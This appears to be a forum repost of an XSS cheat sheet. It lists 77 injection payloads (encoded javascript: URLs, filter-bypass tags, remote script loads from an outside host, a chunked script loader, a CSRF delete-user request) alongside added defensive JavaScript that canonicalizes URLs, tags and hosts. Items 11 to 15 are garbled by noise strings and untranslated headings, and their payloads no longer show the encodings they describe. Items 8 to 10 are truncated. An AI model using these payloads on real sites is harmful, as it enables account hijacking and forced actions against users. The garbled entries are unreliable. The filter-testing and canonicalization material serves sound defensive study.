It seems t00ls has little material on XSS, so when I saw something good I copied it over; not sure whether any of you need it for reference.

(1) Plain XSS: JavaScript injection via an external script
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using the javascript: directive
<IMG SRC="javascript:alert('XSS');">
(Note: javascript: URLs in IMG SRC and in the other resource-loading attributes further down only ran in old browsers such as IE 6 and Netscape-era Mozilla; current browsers refuse them, so these vectors are mainly useful for testing what a filter lets through.)

(3) IMG tag, no semicolon and no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (this form requires the semicolons)
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (decimal character codes, use an ASCII table or calculator; 88,83,83 spells "XSS", so no quotes are needed)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode (long decimal) encoding; use an encoder
<IMG SRC=jav..omitted..S')>

(9) 7-digit decimal Unicode encoding, without semicolons; use an encoder
<IMG SRC=jav..omitted..S')>

(10) Hex encoding, also without semicolons; use an encoder
<IMG SRC=java..omitted..XSS')>
5 k8 Z) H3 v" P0 E' l4 q (11)嵌入式标签,将Javascript分开
1 \; F$ T; T# R |7 L* R! J <IMG SRC=”jav ascript:alert(‘XSS’);”>
* T& d; T2 \- [" B @9 w M' u/ [) z3 J8 N8 j2 ^0 b
(12)嵌入式编码标签,将Javascript分开8 o7 V- X' j, k
<IMG SRC=”jav ascript:alert(‘XSS’);”>. x b! ~( D, G& {7 Y9 ?* h
; e- O9 A2 g9 e2 \
(13)嵌入式换行符$ }& E6 m, O9 k0 Q3 l
<IMG SRC=”jav ascript:alert(‘XSS’);”>
( I( t* W5 P$ x( a8 T8 Y: }" l7 q. R( \ }% `; b* f
(14)嵌入式回车 i: ~3 y. J2 V% B% J+ f8 `' c! h7 o
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- P, }3 q! k8 N$ m/ P! K! q' v1 R( Z5 w* A, S4 a q
(15)嵌入式多行注入JavaScript,这是XSS极端的例子# K/ W3 x+ F/ D8 q; r) \
<IMG SRC=”javascript:alert(‘XSS‘)”>
+ [4 v+ r8 J C9 w; r+ k! a9 z+ J" P* r, t. K. E

(16) Defeating character limits (all snippets on the same page: each script tag appends a few characters to the string and the last one evaluates it)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null byte
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null byte 2 (null bytes are basically useless domestically, since there is nowhere to exploit them)
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out

(19) Spaces and meta characters before the javascript: directive in an IMG tag
<IMG SRC=" &#14;  javascript:alert('XSS');">
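Vectors (3) to (14), (17) and (19) all live in the gap between the raw attribute text a filter sees and the value the browser ends up with after entity decoding and URL cleanup. The block below is an added example, not code from the original post or from the cheat sheet it copies; the function names and the sample inputs are this example's own. It canonicalizes an attribute value the way a browser does (numeric character references decoded with or without a trailing semicolon, leading control characters and spaces stripped, tab, LF and CR deleted) and only then checks for the javascript: scheme, so every encoded or split variant above is recognized, while the null-byte form from (17) is not, matching current browsers.

```javascript
// Added example (not part of the original post): canonicalize an HTML
// attribute value the way a browser does before deciding whether it is a
// javascript: URL. A filter that inspects the raw string misses entities,
// semicolon-less numeric references, case changes and embedded tab/LF/CR;
// checking after canonicalization does not.

const NAMED = { lt: '<', gt: '>', amp: '&', quot: '"', apos: "'" };

// Decode HTML character references. Numeric references are accepted with
// or without a trailing semicolon, as the HTML tokenizer does in attribute
// values; unknown names are left untouched.
function decodeCharRefs(s) {
  return s.replace(/&(#x[0-9a-f]+|#[0-9]+|[a-z]+);?/gi, (m, body) => {
    if (body[0] === '#') {
      const cp = body[1].toLowerCase() === 'x'
        ? parseInt(body.slice(2), 16)
        : parseInt(body.slice(1), 10);
      return cp > 0 && cp <= 0x10ffff ? String.fromCodePoint(cp) : m;
    }
    const v = NAMED[body.toLowerCase()];
    return v === undefined ? m : v;
  });
}

// Mimic the URL parser: strip leading/trailing C0 controls and spaces,
// then delete ASCII tab, LF and CR anywhere in the string.
function canonicalizeUrl(attrValue) {
  let u = decodeCharRefs(attrValue);
  u = u.replace(/^[\x00-\x20]+|[\x00-\x20]+$/g, '');
  u = u.replace(/[\t\n\r]/g, '');
  return u;
}

// Scheme check on the canonical form. A NUL inside the scheme (the old
// java\0script trick from vector 17) is not removed, as in current browsers,
// so that form is reported as NOT a javascript: URL.
function isJavascriptUrl(attrValue) {
  return /^javascript:/i.test(canonicalizeUrl(attrValue));
}

// Constructed samples drawn from vectors (3)-(14), (17) and (19) above.
const SAMPLES = [
  "javascript:alert('XSS')",
  "JaVaScRiPt:alert('XSS')",
  "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
  "&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058alert('XSS')",
  "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29",
  "jav\tascript:alert('XSS');",
  "jav&#x09;ascript:alert('XSS');",
  "jav&#x0A;ascript:alert('XSS');",
  "jav&#x0D;ascript:alert('XSS');",
  " &#14;  javascript:alert('XSS');",
  "java\0script:alert('XSS')",   // legacy null-byte form: not a javascript: URL today
  "http://3w.org/XSS/xss.js",    // ordinary URL, must not be flagged
];

// One row per sample: raw text, what the browser sees, and the verdict.
function report() {
  return SAMPLES.map(s => ({ raw: s, canonical: canonicalizeUrl(s), js: isJavascriptUrl(s) }));
}
```

The practical lesson is the order of operations: decode and normalize first, then match the scheme, and do it on the canonical form the browser will act on rather than on the bytes the attacker typed.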

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Extraneous open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and some other browsers)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2 (protocol-relative URL)
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons (the source text of the regex literal supplies the string)
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping JavaScript escapes (for injection inside an already quoted JS string)
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

(32) BODY background
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag (onload handler)
<BODY ONLOAD=alert('XSS')>

(34) IMG DYNSRC (IE-only attribute)
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND (IE-only tag)
<BGSOUND SRC="javascript:alert('XSS');">

(37) Stylesheet LINK with a javascript: HREF
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) list-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG with VBScript (IE-only)
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META refresh to a javascript: URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) IFRAME
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) FRAME
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) TABLE background
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD background
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters between the open parenthesis and the javascript: directive (IE accepted character codes 1-32, 34, 39, 160, 8192-8013, 12288 and 65279 there)
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

(48) DIV expression (CSS expression() is IE-only; it was dropped in IE8 standards mode)
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with the expression keyword split by a comment
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">

(50) Anonymous tag with a STYLE attribute (anything made of an open angle bracket followed by a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image via a class
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE with expression (a hybrid of the vectors above; the "exp/*" prefix and the comment are what confuse the filter)
exp/*<A STYLE='no\xss:noxss("*//*");
xss:&#101;xpression(alert("XSS"))'>

(53) STYLE background
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash movie that carries the XSS
<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>

(56) ActionScript inside the Flash movie can smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace (IE HTML Components); the .HTC file must be on the same server as your XSS carrier
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered you can put the JS code inside an image file and load it as a script; the file extension does not matter to the script loader
<SCRIPT SRC="http://3w.org/XSS/xss.jpg"></SCRIPT>

(59) IMG embedded commands: this is not arbitrary command execution but request forgery (CSRF). The image request is sent with the victim's cookies, so a state-changing URL on a site the victim is logged into is executed as that user.
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded commands 2 (a.jpg on the same server): an .htaccess rule redirects the harmless-looking image URL to the admin action
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters (a ">" inside a quoted attribute value fools filters that end the tag at the first ">")
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65) (backticks as attribute quotes; old IE only)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67) Assembling the script tag with document.write, so no complete "<SCRIPT SRC=" string appears in the page source
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>
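Vectors (61) to (66) work because a filter and the browser disagree about where the start tag ends. The block below is an added example, not from the original post; the function names and the constructed inputs are this example's own. It puts a naive filter (cut at the first ">", regex the attributes) next to a tokenizer that follows the HTML specification's attribute states, and reports for each vector whether each side sees the SRC attribute.

```javascript
// Added example (not part of the original post): why vectors (61)-(66)
// slip past filters. A filter that ends the tag at the first ">" sees only
// `a="` and no SRC attribute; the HTML tokenizer treats a ">" inside a
// quoted value as part of the value and keeps reading, so the browser does
// see SRC.

// Naive filter logic: cut the tag at the first ">" and regex out attributes.
function naiveAttrs(tag) {
  const head = tag.slice(1, tag.indexOf('>'));
  const attrs = {};
  for (const m of head.matchAll(/([^\s=]+)\s*=\s*"?([^"\s]*)"?/g)) {
    attrs[m[1].toLowerCase()] = m[2];
  }
  return attrs;
}

// Simplified HTML start-tag tokenizer following the spec's attribute
// states: values in "..." or '...' may contain ">", unquoted values end at
// whitespace or ">", and a leading "=" becomes part of the attribute name.
// ieBackticks=true reproduces old Internet Explorer, which also treated
// `...` as a quoted value (vector 65); standards tokenizers do not.
function tokenizeStartTag(tag, ieBackticks = false) {
  const quotes = ieBackticks ? ['"', "'", '`'] : ['"', "'"];
  const isWs = c => c === ' ' || c === '\t' || c === '\n' || c === '\r' || c === '\f';
  let i = 1;                                   // skip the "<"
  let name = '';
  while (i < tag.length && !isWs(tag[i]) && tag[i] !== '>' && tag[i] !== '/') name += tag[i++];
  const attrs = {};
  while (i < tag.length) {
    while (i < tag.length && (isWs(tag[i]) || tag[i] === '/')) i++;
    if (i >= tag.length || tag[i] === '>') break;
    let an = '';
    if (tag[i] === '=') an += tag[i++];        // parse error, but "=" starts the name
    while (i < tag.length && !isWs(tag[i]) && tag[i] !== '=' && tag[i] !== '>' && tag[i] !== '/') an += tag[i++];
    while (i < tag.length && isWs(tag[i])) i++;
    let av = '';
    if (tag[i] === '=') {
      i++;
      while (i < tag.length && isWs(tag[i])) i++;
      if (quotes.includes(tag[i])) {
        const q = tag[i++];
        while (i < tag.length && tag[i] !== q) av += tag[i++];
        i++;                                   // consume the closing quote
      } else {
        while (i < tag.length && !isWs(tag[i]) && tag[i] !== '>') av += tag[i++];
      }
    }
    const key = an.toLowerCase();
    if (!(key in attrs)) attrs[key] = av;      // first occurrence wins, as in browsers
  }
  return { name: name.toLowerCase(), attrs, end: i };   // end: index of the ">" that closes the tag
}

// Constructed inputs: vectors (61)-(66) from the list above.
const TAGS = {
  61: '<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>',
  62: '<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>',
  63: '<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>',
  64: '<SCRIPT "a=\'>\'" SRC="http://3w.org/xss.js"></SCRIPT>',
  65: '<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>',
  66: '<SCRIPT a=">\'>" SRC="http://3w.org/xss.js"></SCRIPT>',
};

// For each vector: does the naive filter see a SRC, does the browser see one?
function compare(ieBackticks = false) {
  const out = {};
  for (const [n, tag] of Object.entries(TAGS)) {
    out[n] = {
      naiveSeesSrc: 'src' in naiveAttrs(tag),
      browserSeesSrc: 'src' in tokenizeStartTag(tag, ieBackticks).attrs,
    };
  }
  return out;
}
```

With the standards tokenizer, (61), (63), (64) and (66) carry a SRC the naive filter never sees; (65) only does so with IE's backtick quoting, which the ieBackticks flag reproduces, and (62) is not a script-with-SRC under a standards tokenizer either way. The fix this illustrates is to sanitize with a real HTML parser and re-serialize, rather than running regexes over the tag text.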

(68) URL bypass: an IP address instead of the hostname
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL (percent) encoding of the hostname
<A HREF="http://%33%77%2E%6F%72%67">XSS</A>

(70) Decimal (dword) IP address; 3232235521 is 192.168.0.1
<A HREF="http://3232235521">XSS</A>

(71) Hex IP address
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) Octal IP address
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding: line breaks, a tab, an encoded tab, and decimal, octal and hex octets in one URL
<A HREF="h
tt	p://6&#09;6.000146.0x7.147/">XSS</A>

(74) Leaving out http:
<A HREF="//www.google.com/">XSS</A>

(75) Leaving out www
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS name (trailing dot)
<A HREF="http://www.google.com./">XSS</A>
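Vectors (68) to (76) are all ways of writing the same host so that a string comparison against an allowlist or denylist fails while the browser still resolves the intended address. The block below is an added example, not from the original post; the function names and the sample links are this example's own. It reduces the host part of a URL attribute to one canonical form the way inet_aton() and a browser's URL parser do: tab, LF and CR deleted, percent-escapes decoded, case folded, the trailing dot dropped, and dword, hex, octal and short-form IPv4 literals turned into dotted quads.

```javascript
// Added example (not part of the original post): canonicalize the host
// forms used in vectors (68)-(76) so that a host check compares canonical
// addresses instead of the literal text.

// One IPv4 part: 0x-prefixed hex, leading-zero octal, otherwise decimal.
// Anything else yields NaN.
function parsePart(p) {
  if (/^0x[0-9a-f]*$/i.test(p)) return p.length === 2 ? 0 : parseInt(p.slice(2), 16);
  if (/^0[0-7]+$/.test(p)) return parseInt(p, 8);
  if (/^(0|[1-9][0-9]*)$/.test(p)) return parseInt(p, 10);
  return NaN;
}

// inet_aton semantics: "a.b.c.d", "a.b.c" (c fills 16 bits), "a.b"
// (b fills 24 bits) and "a" (one 32-bit dword). Returns the dotted-quad
// string, or null if the text is not an IPv4 literal.
function ipv4ToDotted(host) {
  const parts = host.split('.');
  if (parts.length > 4) return null;
  const nums = parts.map(parsePart);
  if (nums.some(Number.isNaN)) return null;
  const last = nums.pop();
  if (nums.some(n => n > 255) || last >= 256 ** (4 - nums.length)) return null;
  let v = last;
  nums.forEach((n, i) => { v += n * 256 ** (3 - i); });
  return [24, 16, 8, 0].map(s => Math.floor(v / 2 ** s) % 256).join('.');
}

// Host extraction for a URL attribute value: delete tab/LF/CR (73), accept
// protocol-relative "//host" (74), percent-decode (69), lowercase, drop the
// trailing dot of an absolute DNS name (76), then fold IPv4 literals.
// Returns null when there is no authority part (e.g. a javascript: URL).
function canonicalHost(url) {
  const u = url.replace(/[\t\n\r]/g, '');
  const m = /^(?:[a-z][a-z0-9+.-]*:)?\/\/([^/?#:]+)/i.exec(u);
  if (!m) return null;
  let host = m[1];
  try { host = decodeURIComponent(host); } catch (e) { /* keep raw text on a bad %-escape */ }
  host = host.toLowerCase().replace(/\.$/, '');
  const ip = ipv4ToDotted(host);
  return ip !== null ? ip : host;
}

// Constructed inputs based on vectors (68)-(76): the first five are all
// 192.168.0.1, then the mixed-encoding host, the percent-encoded host,
// and two spellings of www.google.com.
const LINKS = [
  'http://3232235521',
  'http://0xc0.0xa8.0x00.0x01',
  'http://0300.0250.0000.0001',
  'http://0xc0a80001/',
  'http://192.168.1/',
  'h\ntt\tp://6\t6.000146.0x7.147/',
  'http://%33%77%2E%6F%72%67',
  '//www.google.com/',
  'http://www.google.com./',
];

function canonicalHosts() {
  return LINKS.map(canonicalHost);
}
```

Compare the output of canonicalHost() on both sides of any host check; comparing the raw attribute text is exactly what these vectors are designed to defeat.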

(77) javascript: link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>